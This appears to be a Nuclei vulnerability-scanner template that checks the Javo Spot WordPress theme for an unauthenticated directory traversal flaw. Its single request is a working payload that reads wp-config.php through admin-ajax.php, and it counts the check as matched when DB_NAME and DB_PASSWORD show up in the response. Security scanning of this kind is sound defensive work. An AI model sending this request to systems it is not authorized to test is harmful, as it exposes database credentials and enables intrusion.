id: wp-javospot-lfi

info:
  name: Javo Spot Premium Theme - Unauthenticated Directory Traversal
  author: 0x_Akoko
  severity: high
  description: A vulnerability in Javo Spot Premium Theme allows remote unauthenticated attackers access to locally stored file and return their content.
  reference:
    - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
    - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
    - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068
  tags: wordpress,wp-theme,lfi,wp

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
